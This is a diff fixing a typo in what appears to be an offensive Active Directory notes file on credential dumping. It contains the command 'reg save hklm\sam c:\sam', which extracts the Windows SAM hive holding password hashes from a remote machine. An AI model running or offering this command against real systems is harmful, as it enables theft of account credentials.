vanhohen/ADNinja/Cred dump/USEFULL.md

 ## GET SAM and Security when system running

-On remote computer extrach SAM and SYSTEM
+On remote computer extract SAM and SYSTEM

 	reg save hklm\sam c:\sam